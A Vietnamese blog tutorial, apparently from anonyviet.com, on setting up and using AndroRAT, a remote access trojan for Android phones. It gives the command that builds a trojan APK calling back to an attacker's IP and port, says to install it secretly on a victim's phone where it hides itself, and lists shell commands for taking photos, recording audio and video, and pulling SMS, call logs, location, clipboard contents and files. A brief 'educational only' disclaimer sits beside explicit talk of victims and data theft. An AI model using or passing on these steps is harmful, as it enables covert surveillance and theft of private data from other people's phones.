AndroRAT: Remote và Hack dữ liệu điện thoại Android từ xa

AndroRAT là công cụ được thiết kế để điều khiển Android từ xa và bí mật đánh cắp thông tin. Androrat là ứng dụng client/server được phát triển bằng Java Android cho phía client và server bằng Python.

AndroRAT sẽ hoạt động trên các thiết bị từ Android 4.1 (Jelly Bean) đến Android 9.0 (Oreo) (API 16 đến API 28). AndroRAT cũng hoạt động trên Android 10 (Q) nhưng một số lệnh thông dịch sẽ hoạt động không ổn định.

Phần mềm này chỉ dành cho mục đích giáo dục. Mình sẽ không chịu trách nhiệm về bất kỳ hành vi sử dụng ứng dụng cho mục đích xấu nào.

Chỉ nên sử dụng AndroRAT vào máy của mình để bí mật xem người khác làm gì với máy của bạn, đừng nên cài để theo dõi hoặc đánh cắp dữ liệu người khác, nếu không bạn sẽ chịu trách nhiệm trước pháp luật.

Các tính năng của AndroRAT

Cách cài đặt AndroRAT

Download bộ công cụ AndroRAT

(Password: anonyviet.com)

AndroRAT yêu cầu Python (> 3.6) và JAVA 8 (hoặc Android Studio). Mình có đính kèm trong thư mục Download AndroRAT, bạn tìm trong thư mục Python And Java

Sau khi tải về, bạn giải nén ra, mở cmd và dùng lệnh cd trỏ đến thư mục của AndroRAT, gõ lệnh

pip install colorama

Lưu ý: Trong khi sao chép kho lưu trữ bằng Git bash trên windows, bạn có thể gặp lỗi sau:

error: unable to create file <filename>: Filename too long

Lỗi này là do Git có giới hạn 4096 ký tự cho một tệp, ngoại trừ trên Windows khi Git được biên dịch bằng msys. Nó sử dụng phiên bản cũ hơn của Windows API và có giới hạn là 260 ký tự cho tên tệp.

Bạn có thể fix lỗi này bằng cách đặt core.longpaths thành true.

git config --system core.longpaths true

Bạn phải chạy Git bash với quyền Administrator.

Cách sử dụng AndroRAT

AndroRAT có 2 chế độ:

Tạo file APK (build)


Ví dụ

Mình sẽ tạo ra RAT tên anonyviet.apk, IP Server của Hacker là 192.168.1.50 , Port: 8989, thì sẽ dùng lệnh.

python androRAT.py --build -i 192.168.1.50 -p 8989 -o anonyviet.apk

Trong trường hợp bạn muốn điều khiển máy Android ở ngoài Internet thì cần khai báo IP PublicNAT Port nhé.

OK, bây giờ tiến hành bí mật cài file .apk vừa tạo điện thoại bạn muốn theo dõi. Khi kích hoạt AndroRAT sẽ tự ẩn khỏi màn hình, tránh bị phát hiện.

Điều khiển thiết bị (Shell mode)

Trong trường hợp bạn đã tạo cài đặt thành công file apk vào điện thoại của nạn nhân, tại Server chúng ta sẽ dùng lệnh bên dưới để điều khiển và đánh cắp thông tin của điện thoại.

Usage:
  python androRAT.py --shell [flags]
  Flags:
    -i, --ip                Listner IP address
    -p, --port              Listner port number

Sau khi chạy shell mode, bạn sẽ nhận được trình thông dịch (interpreter) của thiết bị.

Các lệnh có thể chạy trên trình thông dịch:

deviceInfo                 --> Hiển thị thông tin điện thoại
    camList                    --> liệt kê camera  
    takepic [cameraID]         --> Chụp ảnh camera
    startVideo [cameraID]      --> Quay video
    stopVideo                  --> Dừng quay video và lưu file
    startAudio                 --> Ghi âm môi trường bên ngoài
    stopAudio                  --> Dừng ghi âm
    getSMS [inbox|sent]        --> xem tin nhắn SMS và tin đã gửi
    getCallLogs                --> xem nhật ký cuộc gọi
    shell                      --> mở shell để nhập lệnh
    vibrate [number_of_times]  --> thực hiện số lần rung điện thọia
    getLocation                --> xem vị trí hiện tại của thiết bị
    getIP                      --> xem IP
    getSimDetails              --> Xem thông tin SIM
    clear                      --> xóa nội dung lệnh trên màn hình
    getClipData                --> xem nội dung clipboard
    getMACAddress              --> xem địa chỉ MAC Address điện thoại
    exit                       --> thoát

Trong shell còn có một số lệnh con:

get [full_file_path]        --> donwloads the file to the local machine (file size upto 15mb)
    put [filename]              --> uploads the file to the android device

Ví dụ

Mở CMD gõ lệnh: python androRAT.py --shell -i 0.0.0.0 -p 8989Chờ một xíu để Server kết nối với RAT, sau khi thành công bạn sẽ thấy cửa sổ đợi lệnh, tiếp tục gõ các lệnh deviceInfo để lấy thông tin thiết bị

Lệnh camlist sau đó, gõ lệnh takepic 1 để chụp hình Camera trước.

Như vậy bạn có thể điều khiển và đánh cắp dữ liệu điện thoại Android bằng AndroRAT một cách đơn giản rồi. Trong trường hợp muốn kết nối bên ngoài Internet bạn cần phải NAT Port nhé.

Đánh giá post
Exit mobile version